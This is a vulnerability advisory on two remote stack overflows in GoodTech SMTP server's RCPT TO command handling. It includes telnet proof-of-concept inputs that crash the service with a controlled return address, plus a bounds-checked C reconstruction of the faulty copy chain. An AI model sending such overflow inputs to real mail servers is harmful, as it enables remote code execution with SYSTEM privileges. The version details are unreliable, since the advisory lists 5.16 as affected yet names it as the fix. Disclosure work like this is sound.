
GoodTech SMTP server 5.16 RCPT TO command remote buffer overflow



            Arbitrary code execution in GoodTech's SMTP server

                       discovered by Raphaël Rigo

Product: SMTP server by GoodTech Systems
Affected Version: 5.16 Evaluation (verified); registered builds <= 5.16 and 5.15 probably affected too
Not affected Version: 5.17
OS affected: All WinNT (NT/2K/XP/2K3)
Risk: Critical
Remote Exploit: yes
URL: http://www.goodtechsys.com/smtpdnt2000.asp

Overview
========

The product provides Simple Mail Transfer Protocol (SMTP) service to any email
client out of the box, forwarding email messages directly to their recipients.
GoodTech SMTP server runs as a service on the host Windows machine.


Vulnerabilities
===============

         1) Stack overflow in RCPT TO command handling

         Unchecked string copies allow a classic stack overflow.

         Details :
         A cascade of unchecked string copies is responsible for this
         vulnerability :
                - The maximum length of a command is 4096 bytes.
                - The requested email address is copied, without any length
                check, into a 2048-byte buffer (no direct consequences at
                this stage).
                - The domain is extracted and copied, again without a length
                check, into a 256-byte buffer (still no direct consequences).
                - The following code is then executed :
                sprintf(buf, "mx.%s", domain)
                buf is only 64 bytes long and can thus be overflowed,
                overwriting the string that holds the DNS server to be used
                for the MX lookup.
                - Since that string is now non-empty, the following code is
                executed:
                sprintf(buf1024, "Using DNS Server %s", dnsserver)
                and because ~4000 bytes of the domain are available to fill
                dnsserver, this overflows buf1024 and overwrites the return
                address of the function, allowing arbitrary code execution.
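         The copy chain above, rebuilt as a bounds-checked C reconstruction (an added example, not GoodTech's code; the function names and the "RCPT TO: <aa@...>" line shape are assumptions, the buffer sizes are those quoted in the advisory). Each stage rejects input that would have overflowed the next fixed buffer, and the last helper shows the domain length at which the 64-byte "mx." buffer would have been exceeded.

```c
#include <stdio.h>
#include <string.h>
/* Buffer sizes quoted in the advisory. */
#define CMD_MAX    4096
#define EMAIL_MAX  2048
#define DOMAIN_MAX 256
#define MXBUF_MAX  64

/* Copy the domain of "RCPT TO: <user@domain>" into `domain` (capacity `cap`).
   Returns 0 on success, -1 if the line is malformed or the domain would not
   fit: this length check is what the original copy lacked. */
static int extract_domain(const char *cmd, char *domain, size_t cap) {
    const char *at = strchr(cmd, '@');
    if (at == NULL) return -1;
    const char *end = strchr(at, '>');
    if (end == NULL) return -1;
    size_t len = (size_t)(end - at - 1);
    if (len == 0 || len >= cap) return -1;       /* would overflow: reject */
    memcpy(domain, at + 1, len);
    domain[len] = '\0';
    return 0;
}

/* Build "mx.<domain>" into `buf`. snprintf bounds the write and its return
   value exposes truncation, which is rejected rather than looked up. */
static int build_mx_name(const char *domain, char *buf, size_t cap) {
    int n = snprintf(buf, cap, "mx.%s", domain);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* 0 = accepted, -1 = rejected: some fixed buffer would have overflowed. */
int check_rcpt_to(const char *cmd) {
    char email[EMAIL_MAX], domain[DOMAIN_MAX], mxname[MXBUF_MAX];
    size_t cmdlen = strlen(cmd);
    if (cmdlen > CMD_MAX || cmdlen >= sizeof email) return -1;
    strcpy(email, cmd);                          /* safe: length checked */
    if (extract_domain(email, domain, sizeof domain) != 0) return -1;
    return build_mx_name(domain, mxname, sizeof mxname);
}

/* Constructed input in the PoC's shape: "RCPT TO: <aa@" + n x 'a' + ">". */
int check_rcpt_with_domain_len(size_t n) {
    char cmd[CMD_MAX + 32];
    if (n > CMD_MAX) return -1;
    int off = snprintf(cmd, sizeof cmd, "RCPT TO: <aa@");
    memset(cmd + off, 'a', n);
    snprintf(cmd + off + n, sizeof cmd - off - n, ">");
    return check_rcpt_to(cmd);
}
```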

         Risk : Critical
         The attacker may execute arbitrary code with the privileges of the
         SYSTEM user (by default).

         Proof of concept :

         $ telnet localhost 25
         Connected to localhost.
         Escape character is '^]'.
         220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
         HELO aaa
         250 OK
         RCPT TO: <aa@|'A'x1100>
         Connection closed by foreign host.

         Service crashes with EIP==0x41414141

         Workaround :
         There is no possible workaround.

         Solution :
         Update to v5.16

         -----------------------------------------------------------------------

         2) Stack overflow in multiple RCPT TO commands handling

         Unchecked string copy allows a classic stack overflow.

         Details :
         For each RCPT TO command, the server fills a 1300-byte structure
         containing the requested command and the MX server for the requested
         email address.
         The server allows up to 99 RCPT TO commands for a single mail, but
         this structure is filled via an unchecked string copy : the command,
         up to 4096 bytes long, is copied into the structure without any
         length check.
         This behaviour allows us to overwrite the return address of the thread
         by issuing a long command as the 99th RCPT TO command.
         We then have to issue a QUIT command to exit the thread and execute
         our code.

         Risk : Critical
         The attacker may execute arbitrary code with the privileges of the
         SYSTEM user (by default).

         Proof of concept :

         $ telnet localhost 25
         Connected to localhost.
         Escape character is '^]'.
         220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation)
         HELO aaa
         250 OK
         -- Repeat this part 98 times
         RCPT TO: <aa@aa>
         250 OK
         --
         RCPT TO: <|'A'x2600|@localhost>
         250 OK
         QUIT
         Connection closed by foreign host.

         Service crashes with EIP==0x41414141

         Workaround :
         There is no possible workaround.

         Solution :
         Update to v5.16

         -----------------------------------------------------------------------

Acknowledgments
===============

Thanks to the developer for quick response and fix.

Timeline
========
2005-07-19        Discovery
2005-07-21        First attempt to contact developer
2005-07-21        Developer reply
2005-07-22        Fixed version released
2005-07-23        Advisory published